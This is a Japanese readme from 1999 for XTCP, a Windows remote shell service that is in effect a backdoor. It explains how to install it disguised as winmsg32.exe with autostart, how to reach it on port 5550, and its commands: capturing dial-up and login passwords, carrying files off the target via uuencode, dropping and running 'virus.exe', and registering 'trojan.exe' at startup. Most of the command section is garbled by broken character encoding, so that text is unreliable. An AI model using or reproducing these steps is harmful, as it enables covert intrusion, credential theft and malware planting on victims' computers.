        Tiny remote shell service program for Windows - XTCP Version 2.01
                     Produced The Shadow Penguin Security
                      http://shadowpenguin.backsection.net
          Developed by UNYUN (shadowpenguin@backsection.net), 1999/10/26 

[はじめに]

本プログラムはWindows用の簡易シェルサービスプログラムです。Windowsマシンに
本プログラムをインストールすると、TCPポート5550にtelnetクライアントにて接続
することにより、簡易シェルサービスを利用することができます。

[インストール]

install201.exeを実行するだけでOKです。
ただし、install201.exeと同じディレクトリにxtcp201.exeを置いといてください。
これで、xtcp.exeを\windows\system\winmsg32.exeと名前を変えてインストール
し、レジストリ登録で次回から自動起動します。
手動でのインストールは、レジストリ
\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
にエントリを設定することによりWindows起動時に自動起動することができます。


[使用方法]

1. xtcpの仕込まれたターゲットのIPアドレスを調べる(ポート5550のscanでもOK)
2. telnet target-windows 5550でxtcpにログイン．

[コマンド]

OCƁAshellhL[ush]#Ƃvvgo܂BŎgpł
R}hȉɏqׂ܂BȂAshellhL̓JgfBNgƂ
TO܂(蔲ł)Bpath͑SăhCu݂̐΃pX
ĂB

(1) ls fBNg
    w肳ꂽfBNgɊ܂܂t@C\܂BAʏls
    ႢASt@Cꍇ́AK*.*tĂB
    o̓tH[}bǵA
     t@C TCY t
    ŒłB́A
    a : A[JCu
    d : fBNg
    h : Bt@C
    r : ReadOnlyt@C
    s : VXet@C
    łB
    []
    ls c:\*.*           : c:\Ɋ܂܂St@C\
    ls c:\windows\*.ini : c:\windowsɊ܂܂gq.inĩt@CSĕ\

(2) cat eLXgt@C
    eLXgt@C̓e\
    [] cat c:\Setuplog.old

(3) cp t@C Rs[t@C
    t@CRs[
    [] cp c:\Setuplog.old c:\windows\aaa

(4) rm t@C
    t@C폜

(5) ren ύXt@C ύX̃t@C
    t@CύX

(6) exec st@C
    st@CsB\B
    AWin̓GUI𔺂̂͒ӂȂƂȂłB
    Ȃ^[QbgWinőJႢ܂B

(7) mktext t@C
    eLXgt@C쐬
    []
    [ush]#mktext c:\test.txt
    aaa bbb
    ccc
    ^D          ctrl+DL[ŏI
    [ush]#

(8) popup bZ[W
    ^[QbgWinɃ|bvAbvbZ[Wo
    []
    popup Hello. I've hacked your PC. Sorry.

(9) shutdown
    ^[QbgPCVbg_E܂B

(10) reboot
    ^[QbgPCċN܂B

(11) passwd [-s][-t][-d]
    Win95/98W̗̐ڑEChE\ꂽAєFWindow\
    ɃAJEg𔲂ăOƂĕۑ܂B
    āAWPPPڑgȂA邢͎d݌xPPPĂȂ
    ƂȂ񂩂PPPO͎c܂񂵁AFWindowxoȂ
    AuthOc܂B

    PPP,F؃AJEg̃O
    -s : MOJn
    -t : MOI
    -d : Ot@C폜
     : O\

(12) xtelnet ^[QbgIPAhX |[g
    gtelnetƓBvɓݑłB
    |[ǵAtelnetȂ23Apop3Ȃ110ƂłB

(13) uuencode GR[ht@C GR[h̃t@C
    uuencodeŃoCieLXgɕϊ܂BŁA^[Qbg玝
    oCit@Cė܂B
    []
    uuencode c:\test.zip c:\test.uue
    cat c:\test.uueŁAGR[ht@C\ăeLXgGfB^
    ܂B̌́AaishƂŃoCiɕ܂B
    (aishwww.vector.co.jp/vpack/ƂɗĂ܂̂)

(14) uudecode fR[ht@C (o̓t@C)
    uuencodeŃGR[heLXgt@CoCiɕ܂B
    o̓t@C̈ȗƁAGR[h̃t@Cŕ
    ܂B
    []
    
    [ush]#mktext c:\virus.uue
    begin 644 virus.exe
     ---  炩uuencodevirus.exe𒣂 ---
    end
    ^d
    [ush]#uudecode c:\virus.uue c:\xxx.exe   virus.exe𕜌
    [ush]#exec c:\xxx.exe  virus.exes

(15) regrun [-c][-d][-l] ݒ肷l ݒ肷f[^
    
    WXgHKEY_LOCAL_MACHINE
    SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run   
    Ƀt@Co^܂B܂AWinÑt@CN̓o^łB
    
    []
    <1> WinNtrojan.exes
    regrun -c trojan c:\windows\trojan.exe
    <2>
    WinNɎN鍀ڂꗗ\
    regrun -l
    <3>
    Ntrojan̍폜
    regrun -d trojan

(16) logout
    I

[削除方法]

c:\windows\regedit.exeを起動して、
\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
のキーを削除してください。
install.exeを使ってるヒトで、よくわからないヒトは、
\windows\system\winmsg32.exe
をごみばこにポイしてください。

[コンパイル]

exeで不安というヒトはコンパイルして使ってください。
ソースはVC++5.0でコンパイルできます．
Libにwsock32.libを追加してね．
